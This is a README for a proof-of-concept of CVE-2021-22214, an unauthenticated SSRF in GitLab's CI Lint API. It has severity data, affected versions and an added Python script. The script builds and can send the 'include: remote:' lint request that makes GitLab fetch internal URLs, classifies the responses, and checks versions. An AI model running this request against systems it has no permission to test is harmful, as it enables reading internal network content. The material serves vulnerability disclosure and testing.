* CVE-2021-22214
--------
** Description
- POC for CVE-2021-22214: GitLab CI Lint API unauthenticated SSRF vulnerability
- Created by antx on 2021-11-01.
--------
** Detail
- When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.
- The entry point is the CI Lint API (=POST /api/v4/ci/lint=), which in the affected versions accepted requests without authentication. When the submitted pipeline configuration contains an =include: remote:= entry and merged output is requested, GitLab fetches that URL server-side, so an attacker can make the instance request internal addresses and read the fetched content back from the lint response.
- The precondition is the admin setting "Allow requests to the local network from web hooks and services" (Admin Area > Settings > Network > Outbound requests). With it disabled, GitLab's URL blocker rejects localhost and private addresses, so the bug cannot be used to reach the internal network.
--------
** CVE Severity
- vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N
- attackComplexity: HIGH
- attackVector: NETWORK
- availabilityImpact: NONE
- confidentialityImpact: HIGH
- integrityImpact: NONE
- privilegesRequired: NONE
- scope: CHANGED
- userInteraction: NONE
- version: 3.1
- baseScore: 6.7
- baseSeverity: MEDIUM
--------
** Affect
- GitLab >=10.5, <13.10.5
- GitLab >=13.11, <13.11.5
- GitLab >=13.12, <13.12.2
- Fixed in 13.10.5, 13.11.5 and 13.12.2; later releases are not affected.
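As an added example (not the repository's own =CVE-2021-22214.py= and not part of the original README), the following Python script shows the request shape behind the Detail section and checks a version string against the ranges listed above. The endpoint path and payload keys follow the public description of CVE-2021-22214; the sample responses, the "not allowed" error-message heuristic and the helper names are assumptions made here, and the live =send_lint= call must only be pointed at an instance you are authorised to test.

```python
"""Added example for this README (not the repository's CVE-2021-22214.py):
builds the CI Lint request that triggers the SSRF, classifies a lint response,
and checks a GitLab version string against the ranges in the Affect section.
Endpoint and payload shape follow the public write-ups of CVE-2021-22214;
the sample responses below are constructed for illustration, not captured."""
import json
from urllib.request import Request, urlopen

# Affected ranges from the Affect section, as half-open [min, max) tuples.
AFFECTED_RANGES = [
    ((10, 5), (13, 10, 5)),
    ((13, 11), (13, 11, 5)),
    ((13, 12), (13, 12, 2)),
]


def parse_version(version):
    """'13.11.4' -> (13, 11, 4); a trailing '-ee' style suffix is ignored."""
    core = version.split("-")[0]
    return tuple(int(part) for part in core.split("."))


def is_affected(version):
    """True if the version falls inside one of the affected ranges."""
    v = parse_version(version)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


def lint_payload(target_url):
    """JSON body for POST /api/v4/ci/lint. With include_merged_yaml set the
    server resolves `include: remote:` itself, so it fetches target_url for us."""
    ci_yaml = "include:\n  remote: " + target_url + "\n"
    return {"include_merged_yaml": True, "content": ci_yaml}


def classify_response(body):
    """Map a lint response to (verdict, detail).

    fetched - status valid: the remote file was retrieved and echoed in merged_yaml
    blocked - GitLab's URL blocker refused the address: that target is unreachable
    error   - anything else (target returned non-YAML, timeout, ...)
    """
    data = json.loads(body)
    errors = data.get("errors") or []
    joined = " | ".join(errors)
    if data.get("status") == "valid" and data.get("merged_yaml"):
        return "fetched", data["merged_yaml"]
    # "Requests to ... are not allowed" is the URL-blocker wording (assumed stable).
    if "not allowed" in joined:
        return "blocked", joined
    return "error", joined


def send_lint(base_url, target_url, timeout=10):
    """Live check against a GitLab instance you are authorised to test."""
    req = Request(
        base_url.rstrip("/") + "/api/v4/ci/lint",
        data=json.dumps(lint_payload(target_url)).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urlopen(req, timeout=timeout) as resp:
        return classify_response(resp.read().decode())


# Constructed sample responses (assumed shape, not captured from a real instance).
SAMPLE_FETCHED = json.dumps({
    "status": "valid", "errors": [], "warnings": [],
    "merged_yaml": "---\nstages:\n- build\n",
})
SAMPLE_BLOCKED = json.dumps({
    "status": "invalid", "warnings": [],
    "errors": ["Included file `http://127.0.0.1:8080/x.yml`: "
               "Requests to localhost are not allowed"],
})

if __name__ == "__main__":
    for ver in ("13.10.4", "13.10.5", "13.11.4", "14.0.0"):
        print(ver, "affected" if is_affected(ver) else "not affected")
    print(json.dumps(lint_payload("http://127.0.0.1:8080/x.yml")))
    print(classify_response(SAMPLE_FETCHED)[0], classify_response(SAMPLE_BLOCKED)[0])
```

A "blocked" verdict against an internal address is the expected outcome once local outbound requests are disabled or the instance is patched; "fetched" against such an address is the signal the POC looks for.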
--------
** POC
- [[./CVE-2021-22214.py][Python PoC]]
--------
** Reference
- POC
  - [[https://github.com/r0ckysec/CVE-2021-22214][r0ckysec/CVE-2021-22214]]
- CVE
  - [[https://github.com/CVEProject/cvelist/blob/master/2021/22xxx/CVE-2021-22214.json][CVE-2021-22214]]